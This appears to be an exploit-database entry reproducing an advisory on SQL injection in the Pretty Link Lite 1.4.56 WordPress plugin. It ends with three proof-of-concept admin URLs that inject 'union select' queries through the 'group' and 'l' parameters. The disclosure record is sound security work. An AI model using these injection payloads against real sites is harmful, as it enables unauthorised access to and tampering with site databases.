header-logo
Suggest Exploit
vendor:
Pretty Link Lite WordPress Plugin
by:
Unknown
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Pretty Link Lite WordPress Plugin
Affected Version From: 1.4.56
Affected Version To: 1.4.56
Patch Exists: NO
Related CWE: Unknown
CPE: a:pretty_link_lite:pretty_link_lite:1.4.56
Metasploit:
Other Scripts:
Platforms Tested: WordPress
Unknown

Multiple SQL Injection Vulnerabilities in Pretty Link Lite WordPress Plugin

The 'Pretty Link Lite' plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Unknown
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/48469/info

The 'Pretty Link Lite' plugin for WordPress is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Pretty Link Lite 1.4.56 is vulnerable; prior versions may also be affected.

http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&group=-1union
select @@version
http://www.example.com.com/wp-admin/admin.php?page=pretty-link/prli-clicks.php&l=-1union
select @@version
http://www.example.com/wp-admin/admin.php?page=pretty-link/prli-links.php&group=-1union
select @@version